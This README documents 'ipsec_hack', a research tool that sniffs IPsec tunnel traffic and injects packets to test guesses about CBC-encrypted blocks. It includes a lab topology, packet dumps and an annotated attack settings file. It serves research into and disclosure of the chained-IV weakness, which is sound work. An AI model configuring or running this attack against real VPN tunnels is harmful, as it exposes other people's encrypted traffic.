readme

This a good VPN source

From: "Antti Nuopponen" <antti.nuopponen@netseal.com>
	"Sami Vaarala" <sami.vaarala@netseal.com>

More detailed description about the attack made with this software can
be found at: http://www.hut.fi/~svaarala/hakkeri2002/index.html

ipsec_hack is a program that exploits the common IPsec implementation
practise to chain initialization vectors (IVs) across packets with CBC
mode encryption packets.

The program sniffs packet between two IPsec gateways and injects new
packets to the tunnel. By doing this the software is able to verify
guess about any chipper text block seen between the IPsec gateways.

Example of the program usage:
First remember to set the listening interface to promiscous mode! This
can be done with ifconfig (ifconfig eth0 promisc).

Network topology

192.168.200.0/24 +-----+ 10.0.0.0/24     +-----+ 192.168.137.0/24
-----------------| GW2 |--+--------------| GW1 +--+
		 +-----+  |              +-----+  |
			  |	                  |	
			  |   +---+               |
			  +---+ A |---------------+
			      +---+

The GW1 has following IP addresses:
192.168.137.100
10.0.0.1

The GW2 has following IP addresses:
192.168.200.1
10.0.0.2

The A has following IP addresses:
10.0.0.254
192.168.137.191

In the test setup the host A pings the 192.168.200.2 resulting
following packet:

18:48:21.432390 192.168.137.191 > 192.168.200.2: icmp: echo request (DF) (ttl 64, id 0, len 84)
			 4500 0054 0000 4000 4001 6796 c0a8 89bf
			 c0a8 c802 0800 02dc 4a0f 0000 c534 383d
			 bc9f 0600 0809 0a0b 0c0d 0e0f 1011 1213
			 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223
			 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233
			 3435 3637

When the GW1 send it to GW2 the IPsec protected version looks like
this:

18:48:21.432390 10.0.0.1 > 10.0.0.2: ESP(spi=0xd3ac19a6,seq=0x382f9) (ttl 64, id 33749, len 136)
			 4500 0088 83d5 0000 4032 e26c 0a00 0001
			 0a00 0002 d3ac 19a6 0003 82f9 5faa 54fd
			 7c2f c04a 8099 9bd9 4b77 1636 d6a3 03fd
			 59ee 3ee4 29b5 2f57 8c3f 2801 ce5f de7e
			 6420 192a a927 2557 fac9 a2be 9e8d bddb
			 607b 24ca 66e4 045d 9aec f801 827d 05b5
			 ea80 5bef de28 029a b7e9 e724 f067 c70e
			 ca97 af61 e3ff 5be0 f4f7 c4ef 100c 73c5
			 ab13 faa2 a0e2 3903

After this the ipsec_hack program is started with following
parameters:
ipsec_hack file=settings.txt

settings.txt contains following information:
sif=eth0 
lif=eth1
src=10.0.0.1
dst=10.0.0.2
fake_src=192.168.137.179
fake_dst=192.168.200.2
dmac=00:50:56:40:00:63
guess=24:35:36:37:01:02:02:04
block=e3:ff:5b:e0:f4:f7:c4:ef
oiv=f0:67:c7:0e:ca:97:af:61
spi=0xd3ac19a6

These parameter define following things:
"sif" 		the interface through which the attack packet are sent.
"lif" 		the interface in which the IPsec protected packets are seen.
"src" 		the source address of the IPsec connection.
"dst" 		the destination address of the IPsec connection. 
"fake_src" 	the source address of the attack packet. In this example it
	   	is some bogus address from the 192.168.137.0/24 network.
"fake_dst" 	the destination address of the attack packet. Some
		computer that can be reached through the IPsec tunnel
		between G1 and G2. 
"dmac" 		the MAC address of the gateway through which the attack packet
       		are sent. In the example it is the 192.168.137.100
		interface of GW1. 
"guess"		Guess about the contents of the IPsec protected
		block. In this example it is the first block of the
		ping packet plus the IPsec ESP default padding.
"block"		The encrypted block matching the guess block in the
		IPsec protected packet. In this example it is the last
		block before the ESP authenticator field (12 bytes).
"oiv"		IV used to encrypt the block. It is the block before
		the block that is been cracked.
"spi"		Optional parameter that define the IPsec connection
		that is been attacked. If this is not given the
		program will lock to first SPI seen between src and dst.

The src and dst addresses are the tunnel outer addresses and the
fake_src and fake_dst are the tunnel inner addresses.